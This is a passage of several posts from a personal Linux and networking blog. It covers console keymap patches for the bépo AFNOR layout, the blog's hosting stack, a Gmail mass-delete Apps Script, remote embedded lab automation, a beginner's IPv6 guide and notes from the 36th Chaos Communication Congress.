 KEYBOARD_KEY_70018=s          # u
 KEYBOARD_KEY_70019=u          # v

Fun fact: it wouldn't be needed if we had a way to always use a given keymap (say, qwerty) for a device that sends keys like this. And there is such a way, kinda: the systemd developers added such a feature in hwdb 5 years ago, but it still isn't honored by desktop environments.

Inability to type with bépo AFNOR in a Linux console

In 2015, a French standardization process was started to make new and homogeneous French keyboard layouts. In 2019, a new AZERTY layout was standardized. In addition to this, years of community efforts (with which I had nothing to do, but I saw the countless mailing list messages) helped standardize at the same time a new BÉPO layout, bépo 1.1, or bépo AFNOR.

It's almost the same as bépo 1.0, so moving to it was pretty painless. It was also integrated relatively quickly in Linux distributions via the xkeyboard-config project (although it does not have all the compose goodies, which are mostly for exotic characters).

While it was painless to use in desktop environments, this layout did not load during boot in console mode, which plymouth uses for querying the disk passphrase. Since it did not load, the fallback was to an unconfigured qwerty layout, which is not the most comfortable to type a passphrase if you're not used to it. It was reported to Debian, but the issue is identical in Fedora or Ubuntu. After being annoyed for a few months, I took some time to try to fix it.

Virtual TTY keyboard layouts are first converted by ckbcomp from the xkb format, and then loaded into the kernel by kbd. So I had a look at kbd, and after messing around, I sent the following patch upstream:

Subject: [PATCH] src/libkeymap: add support for parsing more unicode values

The auto-generated (with ckbcomp) file fr-bepo_afnor did not load (even
partially), because of an U+1f12f (copyleft symbol) that is wrongly
parsed, generating this error message:

    too many (160) entries on one line

Fix libkeymap so that the keymap can be parsed, even if the offending
character won't be loaded because of the ushort limitation of the
kb_value KDSKBENT uapi.

It's better to have the keymap partially loaded than not at all.
[… cut …]
diff --git a/src/libkeymap/analyze.l b/src/libkeymap/analyze.l
 Hex            0[xX][0-9a-fA-F]+
-Unicode            U\+([0-9a-fA-F]){4}
+Unicode            U\+([0-9a-fA-F]){4,6}
 Literal            [a-zA-Z][a-zA-Z_0-9]*
[… cut …]

-               if (yylval->num >= 0xf000) {
+               if (yylval->num >= 0x10ffff) {
                    ERR(yyextra, _("unicode keysym out of range: %s"),

As you can see, a single symbol '🄯' couldn't be loaded because its unicode value is 5 hex characters instead of 4, and is bigger than the max of 0xf000. So I made the lexer regex recognize longer unicode characters (up to 6, the max allowed), and made the range go to the current unicode limit as well.

Only there is one issue: it was simply incorrect. While it worked on my machine, it was just the wrong thing to do, as you can see with this answer from Alexey Gladkov, kbd's maintainer:

Nop. Partially keymap loading is very dangerous. You can get a completely unusable console. The libkeymap shouldn't break the console if it is known in advance that the keymap is not correct. You should fix ckbcomp so that it generates the correct keymap.

This is because the Linux kernel simply does not support loading unicode symbols greater than 0xf000 with the KDSKBENT ioctl, because the ABI uses 16-bit values. There are probably other reasons internal to the kernel console keyboard or font handling, but I haven't dug into why.

So I changed my kbd patch to show a better error message instead:

Subject: [PATCH] src/libkeymap: better error message on unsupported unicode
 value

The auto-generated (with ckbcomp) file fr-bepo_afnor did not load (even
partially), because of an U+1f12f (copyleft symbol) that is wrongly
parsed, generating this error message:
    too many (160) entries on one line

Fix libkeymap so that the symbol can be parsed, and later generate a
better error message:
    unicode keysym out of range: U+1f12f

At least users will know what is wrong with their keymap.
[… cut …]
diff --git a/src/libkeymap/analyze.l b/src/libkeymap/analyze.l
 Hex            0[xX][0-9a-fA-F]+
-Unicode            U\+([0-9a-fA-F]){4}
+Unicode            U\+([0-9a-fA-F]){4,6}
 Literal            [a-zA-Z][a-zA-Z_0-9]*
[… cut …]
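To illustrate the intent of this second version of the patch, here is a sketch of the same two-step logic written in Rust rather than in the lexer's C: first accept 4 to 6 hex digits so that the token is recognized at all, then reject values the kernel cannot store, with an error that names the problem. `parse_unicode_keysym` and `KeysymError` are hypothetical names, not kbd's API.

```rust
/// Why a "U+xxxx" token was rejected.
#[derive(Debug, PartialEq)]
pub enum KeysymError {
    /// Not of the form U+ followed by 4 to 6 hex digits.
    Malformed,
    /// Well-formed, but too large to be loaded by the kernel.
    OutOfRange(u32),
}

/// First value rejected, same limit as in the patches above.
pub const KERNEL_LIMIT: u32 = 0xf000;

/// Parse a unicode keysym token such as "U+00e9".
pub fn parse_unicode_keysym(token: &str) -> Result<u16, KeysymError> {
    let hex = token.strip_prefix("U+").ok_or(KeysymError::Malformed)?;
    // Equivalent of the {4,6} repetition in the lexer rule.
    if !(4..=6).contains(&hex.len()) || !hex.chars().all(|c| c.is_ascii_hexdigit()) {
        return Err(KeysymError::Malformed);
    }
    let value = u32::from_str_radix(hex, 16).map_err(|_| KeysymError::Malformed)?;
    if value >= KERNEL_LIMIT {
        return Err(KeysymError::OutOfRange(value));
    }
    Ok(value as u16)
}
```

With only 4 digits accepted, "U+1f12f" would not be recognized as a single token, which is how the unrelated "too many entries" message appeared; with 4 to 6 digits, it is recognized and then reported as out of range.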

I then started looking at ckbcomp, a huge Perl script, part of the console-setup project, that is used to do the conversion from the xkb format to a format understandable by kbd.

It already had provisions for removing unknown symbols with the internal $voidsymbol, which I used to replace any character outside of the range supported by Linux.

Here is the patch I sent upstream:

Subject: [PATCH] ckbcomp: fix fr-bepo_afnor conversion by skipping unsupported symbols

Some X keymaps, including fr bepo_afnor use unicode symbols greater than
0xf000; for example the copy left symbol U+1f12f.

These values aren't supported by the linux kernel, so loadkeys won't be
able to load them, or even parse the value.

Skip those symbols to generate valid keymaps.

Fixes: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968195
Signed-off-by: Anisse Astier <anisse@astier.eu>
---
 Keyboard/ckbcomp | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/Keyboard/ckbcomp b/Keyboard/ckbcomp
index e638a24..c3003e6 100755
--- a/Keyboard/ckbcomp
+++ b/Keyboard/ckbcomp
@@ -3815,6 +3815,9 @@ sub uni_to_legacy {
        return $voidsymbol;
    }
     } else {
+        if ($uni >= 0xf000) { # Linux limitation
+            return $voidsymbol;
+        }
    return 'U+'. sprintf ("%04x", $uni);
     }
 }

~~Unfortunately, I've yet to hear from the console-setup maintainers on whether this is correct or not. I'll update this article if the situation changes.~~ In the meantime, I was able to scratch my itch, and I can now type my disk unlock passphrase in plymouth with the bépo 1.1 key layout.

Update: the bug has been fixed on Oct 31st in console-setup 1.206! It made it to Fedora 36, but not Ubuntu 22.04 :-(

Blog update

2020-11-14T00:00:00+01:00

I recently updated the server where this blog is hosted, so I thought I'd do an update on the original post explaining the tech stack used to run it. Once in seven years shouldn't be too meta.

The design

First of all, kudos to Pascal Navière, a very talented polymath who did the design of this site (CSS, DOM structure, etc.), which I then modified. All bugs are therefore my own additions.

Since launch, Pascal has found a career in software engineering. He has so many tricks up his sleeve, you would be surprised. But it's not my place to tell his story.

What I failed to mention initially was all the icons done in CSS art, which was pretty rare at the time, and a secret superpower of Pascal's. The icons are on the left (or bottom for lower resolutions), and in the share bar at the bottom of every article; some of which might be blocked by uBlock lists, and I decided to not work around it. Despite being very careful not to load any external resource (other than the font (update 2021-02-07: I got rid of the third-party font request, it's now useless anyway)), it's not my place to decide if someone thinks the share bar is an annoyance or not.

There's no use for the Google+ icon anymore, so it has been retired. But if you look into the CSS, you can find it with the others.

At the beginning there also wasn't any pagination: I did not deem it necessary with only one article, despite it being in Pascal's original design. I added it later to the templates.

The tech

The DNS you used to access this website is still hosted by gandi. The website itself resides on a Scaleway Stardust instance, more than sufficient for my needs, and currently the cheapest virtual private server in the world. The SSL certificate has been provided by Let's Encrypt for many years now.

On this VPS, Ubuntu 20.04 LTS, with nginx serving the actual pages.

Pages which are all old school static HTML, generated by the venerable Pelican currently at version 4.5.0. I've thought multiple times about moving to another engine like Hugo or Zola, but none has all the features I need (like Pelican webassets which compiles the CSS into a bundle), and I'm too lazy to port the templates anyway.

On my machine pelican is run with python 3.8.6, in a venv where pip was installed. The content is edited with vim on Fedora 32.

Over the years, I did some experiments, like compiling nginx with the Pagespeed plugin, but I've moved back to distro builds since maintaining it wasn't worth the hassle. The website is still served over HTTP/2, and supports IPv6.

Many years ago, I moved to Let's Encrypt instead of StartSSL. The latter isn't trusted anymore by browsers after some woes. I initially settled for simp_le as an ACME client, and deployed it with ansible using L-P's role. It has served me well over the last (almost four) years, but isn't maintained anymore, and simp_le doesn't support the latest version of the protocol, ACMEv2.

As I moved to a new server, I wanted all software to be automatically deployed with ansible.

I had a look at acmetool. There's no official acmetool build of the latest version, and I did not want to install Go on the server, however trivial it might seem, and handle the updating myself. Ditto for trusting a third-party repo. The acmetool version in the distro repos does not support ACMEv2, so I wouldn't be able to get a new certificate, and renewal would stop working in 2021. Therefore I chose to use certbot, the original ACME client.

I initially wanted to use a third party ansible role to simplify deployment, so I then settled on both nginx and certbot roles from Jeff Geerling. I successfully used those to deploy a test site, but was unsatisfied with how complex it was. I had to patch the vendored nginx role to add IPv6 support, and it deployed the redirects using separate files. It all seemed too complex for only one website; a task that could be done with a single ansible template and an apt rule. In addition, the certbot role did not support the nginx plugin, so I rewrote it all, and removed the vendored roles.

The recommended way to install certbot on all Linux distros is to use snapd; and while I understand why they chose this approach (software is always up-to-date, and they control the deployment), snapd is a resource-hog which I had already disabled. So I decided to install certbot and certbot-nginx via pip, and keep them up-to-date automatically with a cron job. That makes a compromised PyPI a point of failure of this server, but I already trust them anyway.

In the end, nginx 1.18.0 (from Ubuntu) and certbot 1.9.0 (from PyPI) are both deployed with ansible 2.10.3, with python 3.8.5 (also from Ubuntu) on the server.

Mass delete of Gmail emails

2020-08-27T23:00:00+02:00

Gmail used to be the reference for "infinite email storage". Not anymore. The space growth stopped, and then Google started selling storage space.

It wouldn't be an issue if it were easy to mass delete emails; unfortunately batch delete operations can be quite long, and even lock you out of your inbox; using the UI, it might even regularly fail. I subscribe to many mailing lists, so I had hundreds of thousands of old emails to delete, and I went looking for a new solution.

For this I used Google Apps Script to run js code on Google's servers to do this delete operation. The goal is to delete the result of a search, or a label.

Here is the code to copy/paste in an Apps Script project:

function deleteOldEmail() {
  var batchSize = 100;
  var threads = [0, ];
  while (threads.length > 0) {
    threads = GmailApp.search('label:Lists-linux-kernel OR label:Lists-stable -{to:me OR from:me} before:2020/8/1');
    for (var j = 0; j < threads.length; j += batchSize) {
      GmailApp.moveThreadsToTrash(threads.slice(j, j+batchSize));
    }
  }
}

(based on this gist or this answer). You'll need to grant it access to gmail.

Here the emails from the search are moved to trash in batches of 100. They are moved to trash because direct deletion of email threads cannot be batched in the same way. Emptying trash is slightly faster than deleting those emails, and once enough space is freed, you can wait for the 30 days deadline to empty the trash automatically.

You can then schedule this deleteOldEmail function regularly by adding a time-based trigger: it will timeout a few times at first if you have a lot of emails, so you want it to be run again to complete the operation.

There are a few limits to know about:

here the batch size corresponds to the maximum size of a moveThreadsToTrash operation
when scheduling it, you don't want to go over the daily limits. I've found that once every 4 hours is enough to be just below the limit (3 hours per day, with 30 minutes per run until timeout).

Depending on how many emails you have, it will complete after a few days. That's it!

The ability to work remotely in Embedded is a sign of software engineering maturity

2020-05-21T00:00:00+02:00

This has been brewing for a while, but I finally put it into words during this pandemic: if you're an embedded software engineer, the ability to work remotely (without the hardware next to you) is in fact a sign that you have reached a certain level of software engineering maturity.

Automation

Being able to automate your setup opens the door to many things: first, automation frees the mind of the menial tasks. I've worked on projects where we had a dedicated reset button on the board. Very fast to reboot, especially when you're writing bootloaders or debugging crashing kernel drivers. And very practical. I thought that was all I needed, but I couldn't have been more wrong.

What's needed is to control the power supply. A reset button is just a bonus, but you need to be able to control the power supply. And if the device does not power on automatically, you need a way to control that, too. On all the recent projects I worked on (STB and GW), the board would turn on automatically on electrical power on. This means you can go cheap and order off-the-shelf USB-controlled power switches; otherwise, it's always possible to build more complex setups, but I like that this uses a standard power supply, up to the wall socket.

I'm assuming you always have a serial port plugged to your hardware; if not you might need one, or a similar facility.

Automation means you can track a hard to reproduce bug that only happens after an electrical reboot. It means you can try to reproduce those hangs easily. It means you can work around bugs that only happen in developer mode when the workaround is easy to automate and much cheaper than the fix.

And it means that in case of a pandemic you can continue working from home, with your hardware in a remote lab or at the office, as if (almost) nothing changed.

sispmctl

The energenie power switch is controlled with the sispmctl package, readily available in most distros. To be able to use it as a user from the dialout group, I use the following udev rule:

SUBSYSTEM=="usb", ATTR{idVendor}=="04b4", ATTR{idProduct}=="fd13", GROUP="dialout", MODE="660"

You can substitute the appropriate vendor and product ids.

I use a simple script to power-cycle port 1 by default, or the port passed in argument:

#!/bin/bash
PORT=${1:-1}
#off
sispmctl -q -f "$PORT"
sleep 2
#on
sispmctl -q -o "$PORT"

For maximum efficiency and saving a few keystrokes I usually have a keyboard shortcut to reboot the port I'm currently working on, mimicking a reset button, but without moving from your keyboard.

ser2net: serial port automation

Why automate the serial port specifically? Isn't reading from a tty trivial? Well, almost. ser2net's initial goal was to make a serial port available over the network, meaning you can remotely connect to a board that is plugged to a different lab computer, without the need for local access on said computer. But this isn't the killer feature of ser2net. Since version 3.2 (now packaged in all distros), ser2net allows multiple clients to connect to a single device.

This means you can have a program that does trivial socket read/write (in telnet mode) to automate a task, and at the same time use the device from your terminal.

Here is how I configure it in /etc/ser2net.conf:

localhost,2000:telnet:0:/dev/blueserial:115200 8DATABITS NONE 1STOPBIT banner max-connections=5

Here I can use the "blue serial port" — I always give my serial ports a name: it usually refers to the color of the cable or the board I'm using — and it will listen in "telnet mode" on port 2000 on localhost only. It can support at most 5 connections in this configuration. You can then connect to it with telnet localhost 2000.
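The "trivial socket read/write" can be sketched in Python as follows. This is a minimal sketch, not a full telnet client: the helper name wait_for is made up for illustration, and it assumes that any telnet negotiation bytes ser2net may send in telnet mode can simply be ignored when searching for a pattern.

```python
import socket
import time


def wait_for(sock, pattern, timeout=30.0):
    """Read from sock until pattern (bytes) shows up; return all bytes read."""
    deadline = time.monotonic() + timeout
    buf = b""
    while pattern not in buf:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise TimeoutError("pattern %r not seen in time" % pattern)
        sock.settimeout(remaining)
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            raise TimeoutError("pattern %r not seen in time" % pattern) from None
        if not chunk:
            raise ConnectionError("serial connection closed")
        buf += chunk
    return buf


# Hypothetical usage against the ser2net port configured above:
#   with socket.create_connection(("localhost", 2000)) as serial:
#       serial.sendall(b"\r\n")
#       wait_for(serial, b"login:", timeout=60)
```

Because ser2net accepts several clients, a script like this can run while you keep your own telnet session open on the same port.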

As a parenthesis, here is the udev rule to give the serial port a name:

SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="FTA6371G", SYMLINK+="blueserial"

I often have multiple serial adapters with the same usb ids, hence the use of the serial number to differentiate them.

Testing

Improving the everyday quality of life is only half the story. Now that you have superpowers, you can use those to enable another superpower: do automated testing.

You might have a testsuite that needs to power-cycle the board ? Very simple to do. You need to check the output of the serial port ? Very simple to automate with a socket.
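As a rough illustration, here is how a testsuite could power-cycle the board from Python. It only mirrors the bash script above (same sispmctl flags, same 2 second pause); the run and sleep parameters are an addition of this sketch so the function can be exercised without the hardware.

```python
import subprocess
import time


def power_cycle(port=1, off_time=2.0, run=subprocess.run, sleep=time.sleep):
    """Switch a sispmctl outlet off, wait, then switch it back on."""
    # -q: quiet, -f: switch outlet off (same flags as the shell script)
    run(["sispmctl", "-q", "-f", str(port)], check=True)
    sleep(off_time)
    # -o: switch outlet on
    run(["sispmctl", "-q", "-o", str(port)], check=True)


# Hypothetical usage in a test: power_cycle(1), then read the boot log
# from the ser2net socket and look for the expected prompt.
```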

Continuous Integration

And once you plug this to your continuous build infrastructure, you can start running your integration tests directly on hardware using the latest version of your software. I won't explain how CI works, but it's probably something you want to have.

LAVA can be useful if you want to build a virtual lab, as part of the chain that manages your board farm, and inside your CI loop; it can integrate with ser2net and your power switch, take your Jenkins artifacts and load them on boards to run your testsuites. You can find many articles and talks on why and how to use LAVA, but I recommend Bootlin's articles as starting point. You can even combine it with lavabo to add board reservation for lab shared with a team.

Not everything can, or should be done remotely (yet)

Working on embedded means you're always close to the hardware. There are things that just can't be automated without paying a very high cost/benefit ratio. But that ratio is much higher than most people think. For example, if you want to go into mass production and care about your yield, you might need to set up a testing bench for a sample (or even all) of your output. Any automation that you do upfront can be reused in the factory, since it's something that will need to be done anyway. And any setup giving you a view of a production board (test points, measurements, etc.) can be reused for a remote setup.

Sure, you won't be doing a board bringup with the hardware in a remote lab. Nor would you be doing certain types of hardware enablement. But that does not mean that you shouldn't at least try to get the low hanging fruit.

And if you want higher software quality, and higher development velocity, investing in tooling can help you get there.

A beginner hacker's guide to IPv6

2020-02-02T20:22:02+01:00

I noticed recently how little I knew about IPv6. For someone working on broadband gateways, that's not something I'm most proud of. But I've learned a little in the past few months, and I thought I'd share it here.

How to read an IPv6 address: the zeroes are hidden

An IPv6 address is 128 bits wide, and written in eight groups of 4 hex-digits, separated by colons, like this:

2001:41d0:0001:c38f:0000:0000:0000:0001

Leading zeroes are ignored, so the previous address can be written like this:

2001:41d0:1:c38f:0:0:0:1

And a sequence of one or more groups that are all zeroes can be replaced with :: (only once per address), so the previous address is canonically written like this:

2001:41d0:1:c38f::1

This is the address of this blog at the time of this writing.
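If you want to check the notation rules yourself, Python's standard ipaddress module can expand and compress an address. A small sketch, using the address above:

```python
import ipaddress

full = ipaddress.IPv6Address("2001:41d0:0001:c38f:0000:0000:0000:0001")
short = ipaddress.IPv6Address("2001:41d0:1:c38f::1")

# All notations describe the same 128-bit value
print(full == short)
# Shortest form: leading zeroes dropped, zero groups replaced by ::
print(full.compressed)
# Full form: eight groups of four hex digits
print(short.exploded)
```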

Put the address inside square brackets for URLs

To reduce the confusion with the IP:PORT notation, an IPv6 address in a URL is enclosed in square brackets:

curl -v http://[2001:41d0:1:c38f::1]

curl -v https://[2001:41d0:1:c38f::1]:443

But not all tools would need that:

ping 2001:41d0:1:c38f::1

ssh 2001:41d0:1:c38f::1
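The same rule applies when building URLs in code. The helper below (url_for is a name made up for this sketch) adds brackets only for IPv6 literals, and urlsplit from the standard library undoes them:

```python
import ipaddress
from urllib.parse import urlsplit


def url_for(host, port, scheme="http"):
    """Build a URL, wrapping IPv6 literals in square brackets."""
    try:
        is_v6 = ipaddress.ip_address(host).version == 6
    except ValueError:
        is_v6 = False  # not an IP literal, probably a hostname
    if is_v6:
        host = "[" + host + "]"
    return "%s://%s:%d/" % (scheme, host, port)


url = url_for("2001:41d0:1:c38f::1", 443, scheme="https")
parts = urlsplit(url)
# parts.hostname is the bare address again, parts.port the integer port
print(url, parts.hostname, parts.port)
```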

Types of IPv6 addresses

There are three types of addresses to know about:

the loopback address ::1; that's your localhost or 127.0.0.1 in IPv4 (or the whole 127.0.0.0/8 subnet)
link-local addresses in the fe80::/10 range : their scope is local, and they shouldn't be routed/forwarded. Equivalent to 169.254.0.0/16 in IPv4.
global addresses; those are globally routed addresses; they're any other address.

Other interesting address types not covered here:

multicast addresses ff00::/8
unique local addresses (previously named site-local) fc00::/7 (can start with fd00:); they are used to build a private network.
the unspecified address :: (all zeroes), used as a placeholder when a host has no address yet. IPv6 has no broadcast; multicast is used instead.
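The ranges above can be checked with Python's ipaddress module. This is a simplified sketch: classify is a made-up helper, and like the list above it calls "global" anything that isn't in one of the named ranges, which ignores other reserved blocks.

```python
import ipaddress

UNIQUE_LOCAL = ipaddress.IPv6Network("fc00::/7")


def classify(text):
    """Return the address type, following the categories listed above."""
    addr = ipaddress.IPv6Address(text)
    if addr.is_unspecified:
        return "unspecified"
    if addr.is_loopback:
        return "loopback"
    if addr.is_multicast:
        return "multicast"
    if addr.is_link_local:
        return "link-local"
    if addr in UNIQUE_LOCAL:
        return "unique local"
    return "global"


for example in ("::1", "fe80::1", "2001:41d0:1:c38f::1", "ff02::1", "fd00::1", "::"):
    print(example, "->", classify(example))
```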

Client IPv6 addresses are autoconfigured by default

In IPv6, client hosts don't use DHCP by default (except in a few cases). They use autoconfiguration, which means the host decides its address by itself, inside a pool of available addresses: this is Stateless Address Auto Configuration (SLAAC). Instead of asking your router to give you an address, in SLAAC the client machine sends a Router Solicitation, to which the router responds with a Router Advertisement that contains the range in which the client can configure an address; the client then chooses an address at random (or based on its MAC address), and runs a collision detection algorithm (Duplicate Address Detection) to prevent having the same address as a peer.

For link-local addresses, there does not even need to be router advertisements: since the range is known by default, a host can pick an address and then run its duplicate detection algorithm.
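For the "based on its MAC address" case, the classic derivation is the modified EUI-64 scheme: insert ff:fe in the middle of the MAC and flip the universal/local bit of the first byte. A sketch of it, where the function name and the example MAC are made up for illustration:

```python
import ipaddress


def eui64_address(prefix, mac):
    """Combine a /64 (or shorter) prefix with a MAC-derived interface id."""
    net = ipaddress.IPv6Network(prefix)
    if net.prefixlen > 64:
        raise ValueError("prefix must leave 64 bits for the interface id")
    octets = bytearray(int(part, 16) for part in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    octets[0] ^= 0x02  # flip the universal/local bit
    interface_id = bytes(octets[:3]) + b"\xff\xfe" + bytes(octets[3:])
    value = int(net.network_address) | int.from_bytes(interface_id, "big")
    return ipaddress.IPv6Address(value)


# Link-local address, no router advertisement needed
print(eui64_address("fe80::/64", "00:11:22:33:44:55"))
# Global address inside an advertised prefix
print(eui64_address("2001:41d0:1:c38f::/64", "00:11:22:33:44:55"))
```

Duplicate Address Detection is not shown here; it happens on the network after the address has been picked.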

DHCPv6 has lost and shouldn't be used

There exists a spec to assign addresses via a DHCP mechanism: DHCPv6. But it isn't supported in Android, by choice. Admins that want to match IPv6 addresses to MAC addresses (say, for compliance purposes) should watch ICMPv6 SLAAC advertisements instead. But in a world of random MAC addresses by default on consumer devices, it doesn't really make sense. It's better to enforce a zero-trust network with a higher level authentication and a VPN.

Use AAAA DNS records

You store IPv6 addresses in an AAAA record instead of an A record:

$ dig anisse.astier.eu AAAA +short
2001:41d0:1:c38f::1

Your ISP gives you more IPv6 addresses than you could ever use

Your ISP probably gives you a /56 or /48 (mine gives a /61): it means that you have 2³⁵ to 2⁴⁸ times more addresses than are available in the whole IPv4 range (ignoring reserved ranges). I could address 2⁶⁷ devices in my network; that's 147,573,952,589,676,412,928 IPs.
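The arithmetic is easy to redo: a prefix of length n leaves 128 - n bits for addresses, and the whole IPv4 space is 2³² addresses. A quick sketch (the 2001:db8:: documentation prefix is only used as a stand-in):

```python
import ipaddress

IPV4_TOTAL = 2 ** 32


def addresses_in(prefix_len):
    """Number of addresses in an IPv6 prefix of the given length."""
    return 2 ** (128 - prefix_len)


for prefix_len in (48, 56, 61):
    ratio = addresses_in(prefix_len) // IPV4_TOTAL
    # ratio is a power of two, so bit_length() - 1 is its exponent
    print("/%d: 2^%d times the IPv4 range" % (prefix_len, ratio.bit_length() - 1))

# Cross-check with the standard library
print(ipaddress.IPv6Network("2001:db8::/61").num_addresses)
```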

Some cloud providers might give you a single IPv6 address (/128). I think this is wrong and short-sighted; mostly used for market segmentation (the simplicity of configuration argument does not hold up to a cursory look).

All your devices are globally reachable

That's the thing that surprises most people used to an IPv4 NAT-ed world mindset. Since your ISP gives you so many addresses, all your local devices can have a globally routed address. And it's a good thing, mostly. What this implies:

you can access your dev web server from anywhere in the world if you listen on global addresses instead of local or loopback ones.
you can send your DNS requests to your home pi-hole wherever you are. Ditto for any service hosted on a random machine in your network.
you can directly connect to a peer for video chat, exchange data, etc. No need for UPnP, UDP hole punching, STUN gateways, and many other types of NAT-traversal technologies.

Security implications: you should make sure privacy extensions are enabled

Unfortunately, by default many OSes used their MAC address to choose a global address with SLAAC. This means that whole-range scanning with masscan-like tools is possible on given OUIs. It takes about 5 minutes to scan the whole IPv4 range nowadays. That's what companies like Shodan or CybelAngel do continuously.

The scan6 tool of the SI6 IPv6 toolkit (covered by Stéphane Bortzmeyer in french) can be used to do this type of scanning on IPv6.

This has the following implications for IPv6:

if badly-configured software starts some VMs with open services and a static network MAC address, you could instantaneously scan a given IPv6 prefix (provided you know its size) for the presence of such a VM, because the last bits of the IPv6 address would always be the same.
If you know a particular (say, IoT) device has open services and is vulnerable; you could scan its OUI for a given IPv6 prefix. That's still 2²⁴ IPs to scan; much less if you know the MAC sequencing pattern. This could be used for targeted attacks, or botnet/worms.
If a device connects to a malicious site, it can be scanned; for example that dev web server on your laptop; and the type of device leaks because the OUI is in the IPv6 address. This breaks the expectation of the IPv4 NAT-ed world where you need to manually forward ports for them to be publicly available.
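To make the leak concrete, here is a sketch of how a remote site could recover the MAC (and therefore the OUI) from a MAC-derived address. It assumes the modified EUI-64 layout, recognizable by the ff:fe bytes in the middle of the last 64 bits; mac_from_eui64 and the example address are made up for illustration.

```python
import ipaddress


def mac_from_eui64(text):
    """Return the MAC embedded in an EUI-64 based address, or None."""
    interface_id = ipaddress.IPv6Address(text).packed[8:]
    if interface_id[3:5] != b"\xff\xfe":
        return None  # random or manually configured interface id
    mac = bytes([interface_id[0] ^ 0x02]) + interface_id[1:3] + interface_id[5:8]
    return ":".join("%02x" % byte for byte in mac)


leaked = mac_from_eui64("2001:41d0:1:c38f:211:22ff:fe33:4455")
# The first three bytes are the OUI, identifying the vendor
print(leaked, "OUI:", leaked[:8])
# An address without the ff:fe marker reveals nothing this way
print(mac_from_eui64("2001:41d0:1:c38f::1"))
```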

Luckily, all of this was understood a long time ago, and there are privacy extensions in IPv6: a way to randomize your SLAAC address, just like we now randomize Wifi MACs on untrusted networks. It is now implemented in most modern OSes. Unfortunately older ones, and some Linux distributions, don't enable privacy extensions by default. In Linux, those addresses are flagged as temporary in the output of ip -6 addr. Those temporary addresses are used when connecting to a service over IPv6, so that your MAC doesn't leak. The address should change regularly.

As far as I understand, privacy extensions address the issue of data leakage, but not the fact that you can then be scanned for mis-configured software (which to be fair is already the case in a NAT-ed IPv4 + websocket world). That's because the initial expectation was to have every device with its own firewall; and consider that it's up to the device to properly handle what's exposed to the world.

Therefore, a small issue I see is that it's hard to have a server application listen only on global IPs. It should enumerate the interfaces and IPs, and only listen on those that have "scope global" but not "temporary" or "secondary" addresses.
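One possible way to do that enumeration is to parse the text output of ip -6 addr. The sketch below is only that, a sketch: the SAMPLE text is hand-written in the usual output layout with documentation-prefix addresses, not captured from a real machine, and stable_global_addresses is a made-up helper name.

```python
from typing import List

# Illustrative input, shaped like `ip -6 addr` output (not a real capture)
SAMPLE = """\
2: wlp2s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 state UP qlen 1000
    inet6 2001:db8:1:2:1c2d:3e4f:5a6b:7c8d/64 scope global temporary dynamic
       valid_lft 86000sec preferred_lft 14000sec
    inet6 2001:db8:1:2:211:22ff:fe33:4455/64 scope global dynamic mngtmpaddr
       valid_lft 86000sec preferred_lft 14000sec
    inet6 fe80::211:22ff:fe33:4455/64 scope link
       valid_lft forever preferred_lft forever
"""


def stable_global_addresses(ip_output: str) -> List[str]:
    """Keep 'scope global' addresses that are not temporary/secondary."""
    result = []
    for line in ip_output.splitlines():
        tokens = line.split()
        if len(tokens) < 4 or tokens[0] != "inet6" or tokens[2] != "scope":
            continue
        address = tokens[1].split("/")[0]
        scope, flags = tokens[3], set(tokens[4:])
        if scope == "global" and not flags & {"temporary", "secondary"}:
            result.append(address)
    return result


print(stable_global_addresses(SAMPLE))
```

On a real machine the input would come from running ip -6 addr (for example through subprocess), and the server would bind one socket per returned address.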

Random Trivia

It has been mandatory to support IPv6 on new devices in Brazil for three years.
It will soon be mandatory in France for 5G carriers.
When using link-local addresses, you should do scoping, which means adding a % and an interface name after the address to specify which interface your connection should go through. But wget does not support link-local scoping; use curl instead. To connect to a link-local IP on port 8080 : curl -v http://[fe80::6e60:6ddd:d354:2234%wlp2s0]:8080
It's 2020 and Fedora still puts ip and ifconfig in /sbin ; without adding it to non-root users' PATH. I don't know why.
At FOSDEM, the default network is IPv6 only, and it works really well. But from time to time you might discover that something is not working. It's because it's not connecting over IPv6 (like the Steam client for instance).

There are many RFCs on IPv6; I couldn't cover here anywhere near everything that a professional network engineer should know. I hope I've covered the basics so that you can search for the rest yourself.

Thanks to Stéphane Bortzmeyer and Neil Armstrong for feedback on this article.

36th Chaos Communication Congress

2019-12-28T13:00:00+01:00

I’m at CCC for the first time this year ! Here are my notes for a few of the talks.

Tamago

In an ideal world, one could pick the programming language of their choice and always generate the optimal machine code. But we live in the real world, and it isn't yet possible. Running code in a constrained environment, like baremetal SoCs means that your choice of languages is reduced, and towards low-level languages like C, which come with their own issues. The motivation for Tamago is to be able to run a higher-level language like Go on baremetal.

The goal of the Tamago project is to run Go on baremetal ARMv7, for example to be able to write security-sensitive bootloaders (firmware) on an NXP i.MX6ULL based usbarmory.

This isn't really a new idea, as Unikernels or library OSes often match the same description. But unikernels didn't match the requirements of depending on no C code (not importing another OS or library), or running on small embedded systems, not the cloud.

Go was chosen here because it's relatively easier to learn than other proven-on-embedded languages like Rust. Currently, Tamago is a patched Go compiler that adds another OS support GOOS=tamago, to be able to run GOARCH=arm on baremetal. The scope is different from TinyGo, that targets micro-controllers instead, and uses a completely different compiler implementation, as well as not supporting the full runtime and Go language yet. It's also different from the recently announced Embedded Go that targets Thumb and bigger microcontrollers.

The goal of Tamago is to be upstream-able in Go. The current patchset is about 3000 lines of code. That's about ~300 lines of glue code, ~2700 lines of re-used code, like the plan9 memory allocator or locking from js,wasm. Then there's ~600 lines of new code to provide ARMv7 and heap init functions.

There are a few functions that should be provided in a board-support package: how to get random data, init hw, print a byte on the console, what is the ram size and offset, and how to get high-res time.

Writing drivers in go can be done easily either using Go's assembly support or using unsafe; it also means that the sensitive parts are identified and can be written with care and audited if needed. In the runtime, the only syscall that is implemented is write(), and it is used for debugging on the serial port.

In order to write a baremetal Go program, one should import the board package library to get its side-effects.

The Tamago authors wrote i.MX6 drivers to test their model: for the DCP co-processor, the HW random generator, a USB driver and a USB networking card (CDC-ACM).

Boot2root: Auditing bootloaders by example

Bootloaders are a critical part of any secure boot chain. The authors of this talk had a look at common open source bootloaders to look for any issue they could find.

